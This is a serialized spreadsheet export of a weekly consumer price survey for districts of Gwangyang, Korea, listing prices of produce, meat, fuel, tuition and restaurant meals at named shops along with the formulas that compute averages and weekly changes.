[8,"소주","1병 360㎖\n(병 보증금 포함)",6,6,{"v":1455,"d":"1,455"},{"v":1446.6666666666667,"d":"1,447"},{"v":-8.333333333333258,"d":"-8"},{"v":-0.0057273768613974275,"d":"-0"},{"$f":"광양읍1!F93","v":{"v":1360,"d":"1,360"}},{"$f":"광양읍1!G93","v":{"v":1360,"d":"1,360"}},{"$f":"광양읍1!H93","v":0},{"$f":"광양읍2!F93","v":{"v":1675,"d":"1,675"}},{"$f":"광양읍2!G93","v":{"v":1625,"d":"1,625"}},{"$f":"광양읍2!H93","v":-50},{"$f":"중마동1!F93","v":{"v":1345,"d":"1,345"}},{"$f":"중마동1!G93","v":{"v":1345,"d":"1,345"}},{"$f":"중마동1!H93","v":0},{"$f":"중마동2!F93","v":{"v":1540,"d":"1,540"}},{"$f":"중마동2!G93","v":{"v":1540,"d":"1,540"}},{"$f":"중마동2!H93","v":0},{"$f":"광영동!F93","v":{"v":1470,"d":"1,470"}},{"$f":"광영동!G93","v":{"v":1470,"d":"1,470"}},{"$f":"광영동!H93","v":0},{"$f":"옥곡면!F93","v":{"v":1340,"d":"1,340"}},{"$f":"옥곡면!G93","v":{"v":1340,"d":"1,340"}},{"$f":"옥곡면!H93","v":0}]
[9,"등유","주유소  1ℓ",2,2,{"v":1375,"d":"1,375"},{"v":1375,"d":"1,375"},0,0,{"$f":"광양읍1!F94","v":{"v":1400,"d":"1,400"}},{"$f":"광양읍1!G94","v":{"v":1400,"d":"1,400"}},{"$f":"광양읍1!H94","v":0},{"$f":"광양읍2!F94","v":{"v":1350,"d":"1,350"}},{"$f":"광양읍2!G94","v":{"v":1350,"d":"1,350"}},{"$f":"광양읍2!H94","v":0},{"$f":"중마동1!F94","v":0},{"$f":"중마동1!G94","v":0},{"$f":"중마동1!H94","v":0},{"$f":"중마동2!F94","v":0},{"$f":"중마동2!G94","v":0},{"$f":"중마동2!H94","v":0},{"$f":"광영동!F94","v":0},{"$f":"광영동!G94","v":0},{"$f":"광영동!H94","v":0},{"$f":"옥곡면!F94","v":0},{"$f":"옥곡면!G94","v":0},{"$f":"옥곡면!H94","v":0}]
[10,"경유","주유소  1ℓ",5,5,{"v":1472.4,"d":"1,472"},{"v":1480.6,"d":"1,481"},{"v":8.199999999999818,"d":"8"},{"v":0.005569138820972438,"d":"0"},{"$f":"광양읍1!F95","v":{"v":1457,"d":"1,457"}},{"$f":"광양읍1!G95","v":{"v":1485,"d":"1,485"}},{"$f":"광양읍1!H95","v":28},{"$f":"광양읍2!F95","v":{"v":1470,"d":"1,470"}},{"$f":"광양읍2!G95","v":{"v":1470,"d":"1,470"}},{"$f":"광양읍2!H95","v":0},{"$f":"중마동1!F95","v":{"v":1503.5,"d":"1,504"}},{"$f":"중마동1!G95","v":{"v":1503.5,"d":"1,504"}},{"$f":"중마동1!H95","v":0},{"$f":"중마동2!F95","v":{"v":1488,"d":"1,488"}},{"$f":"중마동2!G95","v":{"v":1488,"d":"1,488"}},{"$f":"중마동2!H95","v":0},{"$f":"광영동!F95","v":{"v":1443.5,"d":"1,444"}},{"$f":"광영동!G95","v":{"v":1456.5,"d":"1,457"}},{"$f":"광영동!H95","v":13},{"$f":"옥곡면!F95","v":0},{"$f":"옥곡면!G95","v":0},{"$f":"옥곡면!H95","v":0}]
[11,"휘발유","주유소  1ℓ\n(무연)",5,5,{"v":1553.7,"d":"1,554"},{"v":1573.8,"d":"1,574"},{"v":20.09999999999991,"d":"20"},{"v":0.012936860397760127,"d":"0"},{"$f":"광양읍1!F96","v":{"v":1541,"d":"1,541"}},{"$f":"광양읍1!G96","v":{"v":1576,"d":"1,576"}},{"$f":"광양읍1!H96","v":35},{"$f":"광양읍2!F96","v":{"v":1545,"d":"1,545"}},{"$f":"광양읍2!G96","v":{"v":1560,"d":"1,560"}},{"$f":"광양읍2!H96","v":15},{"$f":"중마동1!F96","v":{"v":1578,"d":"1,578"}},{"$f":"중마동1!G96","v":{"v":1588.5,"d":"1,589"}},{"$f":"중마동1!H96","v":{"v":10.5,"d":"11"}},{"$f":"중마동2!F96","v":{"v":1557.5,"d":"1,558"}},{"$f":"중마동2!G96","v":{"v":1578,"d":"1,578"}},{"$f":"중마동2!H96","v":{"v":20.5,"d":"21"}},{"$f":"광영동!F96","v":{"v":1547,"d":"1,547"}},{"$f":"광영동!G96","v":{"v":1566.5,"d":"1,567"}},{"$f":"광영동!H96","v":{"v":19.5,"d":"20"}},{"$f":"옥곡면!F96","v":0},{"$f":"옥곡면!G96","v":0},0]
[12,"피아노\n학원비","관인학원\n(초급반 1개월)",5,5,{"v":143161,"d":"143,161"},{"v":143161,"d":"143,161"},0,0,{"$f":"광양읍1!F97","v":{"v":130000,"d":"130,000"}},{"$f":"광양읍1!G97","v":{"v":130000,"d":"130,000"}},{"$f":"광양읍1!H97","v":0},{"$f":"광양읍2!F97","v":{"v":145805,"d":"145,805"}},{"$f":"광양읍2!G97","v":{"v":145805,"d":"145,805"}},{"$f":"광양읍2!H97","v":0},{"$f":"중마동1!F97","v":{"v":150000,"d":"150,000"}},{"$f":"중마동1!G97","v":{"v":150000,"d":"150,000"}},{"$f":"중마동1!H97","v":0},{"$f":"중마동2!F97","v":{"v":150000,"d":"150,000"}},{"$f":"중마동2!G97","v":{"v":150000,"d":"150,000"}},{"$f":"중마동2!H97","v":0},{"$f":"광영동!F97","v":{"v":140000,"d":"140,000"}},{"$f":"광영동!G97","v":{"v":140000,"d":"140,000"}},{"$f":"광영동!H97","v":0},{"$f":"옥곡면!F97","v":0},{"$f":"옥곡면!G97","v":0},{"$f":"옥곡면!H97","v":0}]
[13,"미술학원비","초등 저학년 1개월\n(재료비 포함)",5,5,{"v":141000,"d":"141,000"},{"v":141000,"d":"141,000"},0,0,{"$f":"광양읍1!F98","v":{"v":145000,"d":"145,000"}},{"$f":"광양읍1!G98","v":{"v":145000,"d":"145,000"}},{"$f":"광양읍1!H98","v":0},{"$f":"광양읍2!F98","v":{"v":135000,"d":"135,000"}},{"$f":"광양읍2!G98","v":{"v":135000,"d":"135,000"}},{"$f":"광양읍2!H98","v":0},{"$f":"중마동1!F98","v":{"v":155000,"d":"155,000"}},{"$f":"중마동1!G98","v":{"v":155000,"d":"155,000"}},{"$f":"중마동1!H98","v":0},{"$f":"중마동2!F98","v":{"v":150000,"d":"150,000"}},{"$f":"중마동2!G98","v":{"v":150000,"d":"150,000"}},{"$f":"중마동2!H98","v":0},{"$f":"광영동!F98","v":{"v":120000,"d":"120,000"}},{"$f":"광영동!G98","v":{"v":120000,"d":"120,000"}},{"$f":"광영동!H98","v":0},{"$f":"옥곡면!F98","v":0},{"$f":"옥곡면!G98","v":0},{"$f":"옥곡면!H98","v":0}]
[]
[{"$nulls":21},{"v":1534,"d":"1,534"}]

{"sheet":"광양읍1","index":1,"n_rows":98,"n_cols":16,"rows_kept":98,"merged":[[1,0,1,15],[2,0,2,6],[2,12,2,13],[3,0,4,0],[3,1,4,1],[3,2,4,2],[3,5,3,7],[3,8,3,11],[3,12,3,15],[5,0,5,2],[34,0,34,2],[84,0,84,2]]}
[]
["주  간  물  가  동  향(광양읍)"]
[{"$nulls":12},"조사자 : 이문주"]
["연번","품목","규격·단위",null,null,"평     균",null,null,"조 사 1 지 역(농협하나로마트)",{"$nulls":3},"조 사 2 지 역(트라이얼코리아)"]
[{"$nulls":5},"금주","금주","증감액","조 사 처","전주","금주","증감액","조 사 처","전주","금주","증감액"]
["농·축·수산물(28개 품목)"]
[1,"쌀","일반미 20kg",{"$f":"COUNTIF(J7,\"<>0\")+COUNTIF(N7,\"<>0\")","v":2},{"$f":"COUNTIF(K7,\"<>0\")+COUNTIF(O7,\"<>0\")","v":2},{"$f":"IF(D7=0,0,SUM(J7,N7)/D7)","v":{"v":59450,"d":"59,450"}},{"$f":"IF(E7=0,0,SUM(K7,O7)/E7)","v":{"v":59450,"d":"59,450"}},{"$f":"G7-F7","v":0},"농협하나로마트",57000,57000,{"$f":"K7-J7","v":0},"트라이얼코리아",{"v":61900,"d":"61,900"},{"v":61900,"d":"61,900"},{"$f":"O7-N7","v":0}]
[2,"무","상품 1개(1㎏)",{"$f":"COUNTIF(J8,\"<>0\")+COUNTIF(N8,\"<>0\")","v":2},{"$f":"COUNTIF(K8,\"<>0\")+COUNTIF(O8,\"<>0\")","v":2},{"$f":"IF(D8=0,0,SUM(J8,N8)/D8)","v":{"v":1312.5,"d":"1,313"}},{"$f":"IF(E8=0,0,SUM(K8,O8)/E8)","v":{"v":1085,"d":"1,085"}},{"$f":"G8-F8","v":{"v":-227.5,"d":"-228"}},"농협하나로마트",1451,941,{"$f":"K8-J8","v":-510},"트라이얼코리아",{"v":1174,"d":"1,174"},{"v":1229,"d":"1,229"},{"$f":"O8-N8","v":55}]
[3,"상추","잎상추 500g",{"$f":"COUNTIF(J9,\"<>0\")+COUNTIF(N9,\"<>0\")","v":2},{"$f":"COUNTIF(K9,\"<>0\")+COUNTIF(O9,\"<>0\")","v":2},{"$f":"IF(D9=0,0,SUM(J9,N9)/D9)","v":{"v":6333,"d":"6,333"}},{"$f":"IF(E9=0,0,SUM(K9,O9)/E9)","v":{"v":7382.5,"d":"7,383"}},{"$f":"G9-F9","v":{"v":1049.5,"d":"1,050"}},"농협하나로마트",4885,6785,{"$f":"K9-J9","v":{"v":1900,"d":"1,900"}},"트라이얼코리아",{"v":7781,"d":"7,781"},{"v":7980,"d":"7,980"},{"$f":"O9-N9","v":199}]
[4,"양상추","상품1개(350~400g)",{"$f":"COUNTIF(J10,\"<>0\")+COUNTIF(N10,\"<>0\")","v":2},{"$f":"COUNTIF(K10,\"<>0\")+COUNTIF(O10,\"<>0\")","v":2},{"$f":"IF(D10=0,0,SUM(J10,N10)/D10)","v":{"v":1350,"d":"1,350"}},{"$f":"IF(E10=0,0,SUM(K10,O10)/E10)","v":{"v":2761.5,"d":"2,762"}},{"$f":"G10-F10","v":{"v":1411.5,"d":"1,412"}},"농협하나로마트",{"v":1115,"d":"1,115"},{"v":2333,"d":"2,333"},{"$f":"K10-J10","v":{"v":1218,"d":"1,218"}},"트라이얼코리아",{"v":1585,"d":"1,585"},{"v":3190,"d":"3,190"},{"$f":"O10-N10","v":{"v":1605,"d":"1,605"}}]
[5,"애호박","상품1개(300~350g)",{"$f":"COUNTIF(J11,\"<>0\")+COUNTIF(N11,\"<>0\")","v":2},{"$f":"COUNTIF(K11,\"<>0\")+COUNTIF(O11,\"<>0\")","v":2},{"$f":"IF(D11=0,0,SUM(J11,N11)/D11)","v":{"v":2895,"d":"2,895"}},{"$f":"IF(E11=0,0,SUM(K11,O11)/E11)","v":{"v":3145,"d":"3,145"}},{"$f":"G11-F11","v":250},"농협하나로마트",{"v":3300,"d":"3,300"},{"v":3300,"d":"3,300"},{"$f":"K11-J11","v":0},"트라이얼코리아",{"v":2490,"d":"2,490"},{"v":2990,"d":"2,990"},{"$f":"O11-N11","v":500}]
[6,"열무","상품 4kg(1단)",{"$f":"COUNTIF(J12,\"<>0\")+COUNTIF(N12,\"<>0\")","v":0},{"$f":"COUNTIF(K12,\"<>0\")+COUNTIF(O12,\"<>0\")","v":0},{"$f":"IF(D12=0,0,SUM(J12,N12)/D12)","v":0},{"$f":"IF(E12=0,0,SUM(K12,O12)/E12)","v":0},{"$f":"G12-F12","v":0},"농협하나로마트",0,0,{"$f":"K12-J12","v":0},"트라이얼코리아",0,0,{"$f":"O12-N12","v":0}]
[7,"양파","1망 1kg",{"$f":"COUNTIF(J13,\"<>0\")+COUNTIF(N13,\"<>0\")","v":2},{"$f":"COUNTIF(K13,\"<>0\")+COUNTIF(O13,\"<>0\")","v":2},{"$f":"IF(D13=0,0,SUM(J13,N13)/D13)","v":{"v":3345,"d":"3,345"}},{"$f":"IF(E13=0,0,SUM(K13,O13)/E13)","v":{"v":2995,"d":"2,995"}},{"$f":"G13-F13","v":-350},"농협하나로마트",3200,3500,{"$f":"K13-J13","v":300},"트라이얼코리아",{"v":3490,"d":"3,490"},{"v":2490,"d":"2,490"},{"$f":"O13-N13","v":{"v":-1000,"d":"-1,000"}}]
[8,"오이","상품 3개",{"$f":"COUNTIF(J14,\"<>0\")+COUNTIF(N14,\"<>0\")","v":2},{"$f":"COUNTIF(K14,\"<>0\")+COUNTIF(O14,\"<>0\")","v":2},{"$f":"IF(D14=0,0,SUM(J14,N14)/D14)","v":{"v":5242.5,"d":"5,243"}},{"$f":"IF(E14=0,0,SUM(K14,O14)/E14)","v":{"v":5442.5,"d":"5,443"}},{"$f":"G14-F14","v":200},"농협하나로마트",4500,4900,{"$f":"K14-J14","v":400},"트라이얼코리아",{"v":5985,"d":"5,985"},{"v":5985,"d":"5,985"},{"$f":"O14-N14","v":0}]
[9,"풋고추","신선한것 1kg",{"$f":"COUNTIF(J15,\"<>0\")+COUNTIF(N15,\"<>0\")","v":2},{"$f":"COUNTIF(K15,\"<>0\")+COUNTIF(O15,\"<>0\")","v":2},{"$f":"IF(D15=0,0,SUM(J15,N15)/D15)","v":{"v":24114.5,"d":"24,115"}},{"$f":"IF(E15=0,0,SUM(K15,O15)/E15)","v":{"v":25559.5,"d":"25,560"}},{"$f":"G15-F15","v":{"v":1445,"d":"1,445"}},"농협하나로마트",18229,26119,{"$f":"K15-J15","v":{"v":7890,"d":"7,890"}},"트라이얼코리아",{"v":30000,"d":"30,000"},{"v":25000,"d":"25,000"},{"$f":"O15-N15","v":{"v":-5000,"d":"-5,000"}}]
[10,"마늘","깐것 상품 1kg",{"$f":"COUNTIF(J16,\"<>0\")+COUNTIF(N16,\"<>0\")","v":2},{"$f":"COUNTIF(K16,\"<>0\")+COUNTIF(O16,\"<>0\")","v":2},{"$f":"IF(D16=0,0,SUM(J16,N16)/D16)","v":{"v":9900,"d":"9,900"}},{"$f":"IF(E16=0,0,SUM(K16,O16)/E16)","v":{"v":9900,"d":"9,900"}},{"$f":"G16-F16","v":0},"농협하나로마트",9900,9900,{"$f":"K16-J16","v":0},"트라이얼코리아",{"v":9900,"d":"9,900"},{"v":9900,"d":"9,900"},{"$f":"O16-N16","v":0}]
[11,"감자","흰색 1kg",{"$f":"COUNTIF(J17,\"<>0\")+COUNTIF(N17,\"<>0\")","v":2},{"$f":"COUNTIF(K17,\"<>0\")+COUNTIF(O17,\"<>0\")","v":2},{"$f":"IF(D17=0,0,SUM(J17,N17)/D17)","v":{"v":6449.5,"d":"6,450"}},{"$f":"IF(E17=0,0,SUM(K17,O17)/E17)","v":{"v":5950,"d":"5,950"}},{"$f":"G17-F17","v":{"v":-499.5,"d":"-500"}},"농협하나로마트",6999,6000,{"$f":"K17-J17","v":-999},"트라이얼코리아",{"v":5900,"d":"5,900"},{"v":5900,"d":"5,900"},{"$f":"O17-N17","v":0}]
[12,"배추","1포기 3kg",{"$f":"COUNTIF(J18,\"<>0\")+COUNTIF(N18,\"<>0\")","v":2},{"$f":"COUNTIF(K18,\"<>0\")+COUNTIF(O18,\"<>0\")","v":2},{"$f":"IF(D18=0,0,SUM(J18,N18)/D18)","v":{"v":4795,"d":"4,795"}},{"$f":"IF(E18=0,0,SUM(K18,O18)/E18)","v":{"v":4995,"d":"4,995"}},{"$f":"G18-F18","v":200},"농협하나로마트",4600,4000,{"$f":"K18-J18","v":-600},"트라이얼코리아",{"v":4990,"d":"4,990"},{"v":5990,"d":"5,990"},{"$f":"O18-N18","v":{"v":1000,"d":"1,000"}}]
[13,"콩나물","1봉지 500g ",{"$f":"COUNTIF(J19,\"<>0\")+COUNTIF(N19,\"<>0\")","v":2},{"$f":"COUNTIF(K19,\"<>0\")+COUNTIF(O19,\"<>0\")","v":2},{"$f":"IF(D19=0,0,SUM(J19,N19)/D19)","v":{"v":2157.5,"d":"2,158"}},{"$f":"IF(E19=0,0,SUM(K19,O19)/E19)","v":{"v":2157.5,"d":"2,158"}},{"$f":"G19-F19","v":0},"농협하나로마트",2625,2625,{"$f":"K19-J19","v":0},"트라이얼코리아",{"v":1690,"d":"1,690"},{"v":1690,"d":"1,690"},{"$f":"O19-N19","v":0}]
[14,"사과","상품 1개(300∼350g)",{"$f":"COUNTIF(J20,\"<>0\")+COUNTIF(N20,\"<>0\")","v":2},{"$f":"COUNTIF(K20,\"<>0\")+COUNTIF(O20,\"<>0\")","v":2},{"$f":"IF(D20=0,0,SUM(J20,N20)/D20)","v":{"v":4650,"d":"4,650"}},{"$f":"IF(E20=0,0,SUM(K20,O20)/E20)","v":{"v":5250,"d":"5,250"}},{"$f":"G20-F20","v":600},"농협하나로마트",5600,5600,{"$f":"K20-J20","v":0},"트라이얼코리아",{"v":3700,"d":"3,700"},{"v":4900,"d":"4,900"},{"$f":"O20-N20","v":{"v":1200,"d":"1,200"}}]
[15,"배","상품 1개(650∼700g)",{"$f":"COUNTIF(J21,\"<>0\")+COUNTIF(N21,\"<>0\")","v":2},{"$f":"COUNTIF(K21,\"<>0\")+COUNTIF(O21,\"<>0\")","v":2},{"$f":"IF(D21=0,0,SUM(J21,N21)/D21)","v":{"v":5250,"d":"5,250"}},{"$f":"IF(E21=0,0,SUM(K21,O21)/E21)","v":{"v":5850,"d":"5,850"}},{"$f":"G21-F21","v":600},"농협하나로마트",6800,6800,{"$f":"K21-J21","v":0},"트라이얼코리아",{"v":3700,"d":"3,700"},{"v":4900,"d":"4,900"},{"$f":"O21-N21","v":{"v":1200,"d":"1,200"}}]
[16,"바나나","상품 1kg",{"$f":"COUNTIF(J22,\"<>0\")+COUNTIF(N22,\"<>0\")","v":2},{"$f":"COUNTIF(K22,\"<>0\")+COUNTIF(O22,\"<>0\")","v":2},{"$f":"IF(D22=0,0,SUM(J22,N22)/D22)","v":{"v":3093.5,"d":"3,094"}},{"$f":"IF(E22=0,0,SUM(K22,O22)/E22)","v":{"v":4204,"d":"4,204"}},{"$f":"G22-F22","v":{"v":1110.5,"d":"1,111"}},"농협하나로마트",{"v":3092,"d":"3,092"},{"v":5172,"d":"5,172"},{"$f":"K22-J22","v":{"v":2080,"d":"2,080"}},"트라이얼코리아",{"v":3095,"d":"3,095"},{"v":3236,"d":"3,236"},{"$f":"O22-N22","v":141}]
[17,"쇠고기\n(한우)","등심 600g(상등육)",{"$f":"COUNTIF(J23,\"<>0\")+COUNTIF(N23,\"<>0\")","v":2},{"$f":"COUNTIF(K23,\"<>0\")+COUNTIF(O23,\"<>0\")","v":2},{"$f":"IF(D23=0,0,SUM(J23,N23)/D23)","v":{"v":66000,"d":"66,000"}},{"$f":"IF(E23=0,0,SUM(K23,O23)/E23)","v":{"v":41250,"d":"41,250"}},{"$f":"G23-F23","v":{"v":-24750,"d":"-24,750"}},"농협하나로마트",{"v":66000,"d":"66,000"},{"v":75000,"d":"75,000"},{"$f":"K23-J23","v":{"v":9000,"d":"9,000"}},"트라이얼코리아",{"v":66000,"d":"66,000"},{"v":7500,"d":"7,500"},{"$f":"O23-N23","v":{"v":-58500,"d":"-58,500"}}]
[18,"쇠고기\n(수입육)","등심 600g(상등육)",{"$f":"COUNTIF(J24,\"<>0\")+COUNTIF(N24,\"<>0\")","v":0},{"$f":"COUNTIF(K24,\"<>0\")+COUNTIF(O24,\"<>0\")","v":0},{"$f":"IF(D24=0,0,SUM(J24,N24)/D24)","v":0},{"$f":"IF(E24=0,0,SUM(K24,O24)/E24)","v":0},{"$f":"G24-F24","v":0},"농협하나로마트",0,0,{"$f":"K24-J24","v":0},"트라이얼코리아",0,0,{"$f":"O24-N24","v":0}]
[19,"돼지고기","삼겹살 600g(상등육)",{"$f":"COUNTIF(J25,\"<>0\")+COUNTIF(N25,\"<>0\")","v":2},{"$f":"COUNTIF(K25,\"<>0\")+COUNTIF(O25,\"<>0\")","v":2},{"$f":"IF(D25=0,0,SUM(J25,N25)/D25)","v":{"v":14100,"d":"14,100"}},{"$f":"IF(E25=0,0,SUM(K25,O25)/E25)","v":{"v":14100,"d":"14,100"}},{"$f":"G25-F25","v":0},"농협하나로마트",{"v":14100,"d":"14,100"},{"v":14100,"d":"14,100"},{"$f":"K25-J25","v":0},"트라이얼코리아",{"v":14100,"d":"14,100"},{"v":14100,"d":"14,100"},{"$f":"O25-N25","v":0}]
[20,"닭고기","육계 1마리(1kg 정도)",{"$f":"COUNTIF(J26,\"<>0\")+COUNTIF(N26,\"<>0\")","v":2},{"$f":"COUNTIF(K26,\"<>0\")+COUNTIF(O26,\"<>0\")","v":2},{"$f":"IF(D26=0,0,SUM(J26,N26)/D26)","v":{"v":7150,"d":"7,150"}},{"$f":"IF(E26=0,0,SUM(K26,O26)/E26)","v":{"v":7250,"d":"7,250"}},{"$f":"G26-F26","v":100},"농협하나로마트",{"v":7500,"d":"7,500"},{"v":7500,"d":"7,500"},{"$f":"K26-J26","v":0},"트라이얼코리아",{"v":6800,"d":"6,800"},{"v":7000,"d":"7,000"},{"$f":"O26-N26","v":200}]
[21,"달걀","특란 30개 한판",{"$f":"COUNTIF(J27,\"<>0\")+COUNTIF(N27,\"<>0\")","v":2},{"$f":"COUNTIF(K27,\"<>0\")+COUNTIF(O27,\"<>0\")","v":2},{"$f":"IF(D27=0,0,SUM(J27,N27)/D27)","v":{"v":7920,"d":"7,920"}},{"$f":"IF(E27=0,0,SUM(K27,O27)/E27)","v":{"v":6920,"d":"6,920"}},{"$f":"G27-F27","v":{"v":-1000,"d":"-1,000"}},"농협하나로마트",{"v":8850,"d":"8,850"},{"v":8850,"d":"8,850"},{"$f":"K27-J27","v":0},"트라이얼코리아",{"v":6990,"d":"6,990"},{"v":4990,"d":"4,990"},{"$f":"O27-N27","v":{"v":-2000,"d":"-2,000"}}]
[22,"조기","15cm 1마리",{"$f":"COUNTIF(J28,\"<>0\")+COUNTIF(N28,\"<>0\")","v":1},{"$f":"COUNTIF(K28,\"<>0\")+COUNTIF(O28,\"<>0\")","v":1},{"$f":"IF(D28=0,0,SUM(J28,N28)/D28)","v":{"v":1633,"d":"1,633"}},{"$f":"IF(E28=0,0,SUM(K28,O28)/E28)","v":{"v":2600,"d":"2,600"}},{"$f":"G28-F28","v":967},"농협하나로마트",{"v":1633,"d":"1,633"},{"v":2600,"d":"2,600"},{"$f":"K28-J28","v":967},"트라이얼코리아",0,0,{"$f":"O28-N28","v":0}]
[23,"갈치","60cm 1마리",{"$f":"COUNTIF(J29,\"<>0\")+COUNTIF(N29,\"<>0\")","v":1},{"$f":"COUNTIF(K29,\"<>0\")+COUNTIF(O29,\"<>0\")","v":1},{"$f":"IF(D29=0,0,SUM(J29,N29)/D29)","v":{"v":7000,"d":"7,000"}},{"$f":"IF(E29=0,0,SUM(K29,O29)/E29)","v":{"v":7800,"d":"7,800"}},{"$f":"G29-F29","v":800},"농협하나로마트",{"v":7000,"d":"7,000"},{"v":7800,"d":"7,800"},{"$f":"K29-J29","v":800},"트라이얼코리아",0,0,{"$f":"O29-N29","v":0}]
[24,"명태","40cm 1마리",{"$f":"COUNTIF(J30,\"<>0\")+COUNTIF(N30,\"<>0\")","v":1},{"$f":"COUNTIF(K30,\"<>0\")+COUNTIF(O30,\"<>0\")","v":1},{"$f":"IF(D30=0,0,SUM(J30,N30)/D30)","v":{"v":3800,"d":"3,800"}},{"$f":"IF(E30=0,0,SUM(K30,O30)/E30)","v":{"v":3800,"d":"3,800"}},{"$f":"G30-F30","v":0},"농협하나로마트",{"v":3800,"d":"3,800"},{"v":3800,"d":"3,800"},{"$f":"K30-J30","v":0},"트라이얼코리아",0,0,{"$f":"O30-N30","v":0}]
[25,"고등어","30cm 1마리",{"$f":"COUNTIF(J31,\"<>0\")+COUNTIF(N31,\"<>0\")","v":1},{"$f":"COUNTIF(K31,\"<>0\")+COUNTIF(O31,\"<>0\")","v":1},{"$f":"IF(D31=0,0,SUM(J31,N31)/D31)","v":{"v":2800,"d":"2,800"}},{"$f":"IF(E31=0,0,SUM(K31,O31)/E31)","v":{"v":2800,"d":"2,800"}},{"$f":"G31-F31","v":0},"농협하나로마트",{"v":2800,"d":"2,800"},{"v":2800,"d":"2,800"},{"$f":"K31-J31","v":0},"트라이얼코리아",0,0,{"$f":"O31-N31","v":0}]
[26,"냉동오징어","30cm 1마리",{"$f":"COUNTIF(J32,\"<>0\")+COUNTIF(N32,\"<>0\")","v":1},{"$f":"COUNTIF(K32,\"<>0\")+COUNTIF(O32,\"<>0\")","v":1},{"$f":"IF(D32=0,0,SUM(J32,N32)/D32)","v":{"v":5000,"d":"5,000"}},{"$f":"IF(E32=0,0,SUM(K32,O32)/E32)","v":{"v":6000,"d":"6,000"}},{"$f":"G32-F32","v":{"v":1000,"d":"1,000"}},"농협하나로마트",{"v":5000,"d":"5,000"},{"v":6000,"d":"6,000"},{"$f":"K32-J32","v":{"v":1000,"d":"1,000"}},"트라이얼코리아",0,0,{"$f":"O32-N32","v":0}]
[27,"콩","상품 1kg",{"$f":"COUNTIF(J33,\"<>0\")+COUNTIF(N33,\"<>0\")","v":0},{"$f":"COUNTIF(K33,\"<>0\")+COUNTIF(O33,\"<>0\")","v":0},{"$f":"IF(D33=0,0,SUM(J33,N33)/D33)","v":0},{"$f":"IF(E33=0,0,SUM(K33,O33)/E33)","v":0},{"$f":"G33-F33","v":0},"농협하나로마트",0,0,{"$f":"K33-J33","v":0},"트라이얼코리아",0,0,{"$f":"O33-N33","v":0}]
[28,"고춧가루","상품 3kg",{"$f":"COUNTIF(J34,\"<>0\")+COUNTIF(N34,\"<>0\")","v":2},{"$f":"COUNTIF(K34,\"<>0\")+COUNTIF(O34,\"<>0\")","v":2},{"$f":"IF(D34=0,0,SUM(J34,N34)/D34)","v":{"v":99450,"d":"99,450"}},{"$f":"IF(E34=0,0,SUM(K34,O34)/E34)","v":{"v":99450,"d":"99,450"}},{"$f":"G34-F34","v":0},"농협하나로마트",{"v":115200,"d":"115,200"},{"v":115200,"d":"115,200"},{"$f":"K34-J34","v":0},"트라이얼코리아",{"v":83700,"d":"83,700"},{"v":83700,"d":"83,700"},{"$f":"O34-N34","v":0}]
["개인서비스 요금(49개 품목)",{"$nulls":4},0]
[1,"설렁탕","1인분 (보통)",{"$f":"COUNTIF(J36,\"<>0\")+COUNTIF(N36,\"<>0\")","v":2},{"$f":"COUNTIF(K36,\"<>0\")+COUNTIF(O36,\"<>0\")","v":2},{"$f":"IF(D36=0,0,SUM(J36,N36)/D36)","v":{"v":9500,"d":"9,500"}},{"$f":"IF(E36=0,0,SUM(K36,O36)/E36)","v":{"v":9500,"d":"9,500"}},0,"함흥냉면",9000,9000,{"$f":"K36-J36","v":0},"투가리국밥",{"v":10000,"d":"10,000"},{"v":10000,"d":"10,000"},{"$f":"O36-N36","v":0}]
[2,"냉면","물냉면, 1인분(보통)",{"$f":"COUNTIF(J37,\"<>0\")+COUNTIF(N37,\"<>0\")","v":2},{"$f":"COUNTIF(K37,\"<>0\")+COUNTIF(O37,\"<>0\")","v":2},{"$f":"IF(D37=0,0,SUM(J37,N37)/D37)","v":{"v":9500,"d":"9,500"}},{"$f":"IF(E37=0,0,SUM(K37,O37)/E37)","v":{"v":9500,"d":"9,500"}},0,"함흥냉면",10000,10000,{"$f":"K37-J37","v":0},"호호냉면",{"v":9000,"d":"9,000"},{"v":9000,"d":"9,000"},{"$f":"O37-N37","v":0}]
[3,"비빔밥","1인분(보통)",{"$f":"COUNTIF(J38,\"<>0\")+COUNTIF(N38,\"<>0\")","v":2},{"$f":"COUNTIF(K38,\"<>0\")+COUNTIF(O38,\"<>0\")","v":2},{"$f":"IF(D38=0,0,SUM(J38,N38)/D38)","v":{"v":8000,"d":"8,000"}},{"$f":"IF(E38=0,0,SUM(K38,O38)/E38)","v":{"v":8000,"d":"8,000"}},0,"남일보리밥",10000,10000,{"$f":"K38-J38","v":0},"이파리",{"v":6000,"d":"6,000"},{"v":6000,"d":"6,000"},{"$f":"O38-N38","v":0}]
[4,"갈비탕","1인분(보통)",{"$f":"COUNTIF(J39,\"<>0\")+COUNTIF(N39,\"<>0\")","v":2},{"$f":"COUNTIF(K39,\"<>0\")+COUNTIF(O39,\"<>0\")","v":2},{"$f":"IF(D39=0,0,SUM(J39,N39)/D39)","v":{"v":13500,"d":"13,500"}},{"$f":"IF(E39=0,0,SUM(K39,O39)/E39)","v":{"v":13500,"d":"13,500"}},0,"호호냉면",12000,12000,{"$f":"K39-J39","v":0},"투가리국밥",{"v":15000,"d":"15,000"},{"v":15000,"d":"15,000"},{"$f":"O39-N39","v":0}]
[5,"삼계탕","1인분(보통)",{"$f":"COUNTIF(J40,\"<>0\")+COUNTIF(N40,\"<>0\")","v":2},{"$f":"COUNTIF(K40,\"<>0\")+COUNTIF(O40,\"<>0\")","v":2},{"$f":"IF(D40=0,0,SUM(J40,N40)/D40)","v":{"v":13500,"d":"13,500"}},{"$f":"IF(E40=0,0,SUM(K40,O40)/E40)","v":{"v":13500,"d":"13,500"}},{"$f":"G40-F40","v":0},"고려삼계탕",14000,14000,{"$f":"K40-J40","v":0},"마로정",{"v":13000,"d":"13,000"},{"v":13000,"d":"13,000"},{"$f":"O40-N40","v":0}]
[6,"된장찌개\n백반","1인분(보통)",{"$f":"COUNTIF(J41,\"<>0\")+COUNTIF(N41,\"<>0\")","v":2},{"$f":"COUNTIF(K41,\"<>0\")+COUNTIF(O41,\"<>0\")","v":2},{"$f":"IF(D41=0,0,SUM(J41,N41)/D41)","v":{"v":7750,"d":"7,750"}},{"$f":"IF(E41=0,0,SUM(K41,O41)/E41)","v":{"v":7750,"d":"7,750"}},{"$f":"G41-F41","v":0},"낙지뻘식당",9000,9000,{"$f":"K41-J41","v":0},"이파리",{"v":6500,"d":"6,500"},{"v":6500,"d":"6,500"},{"$f":"O41-N41","v":0}]
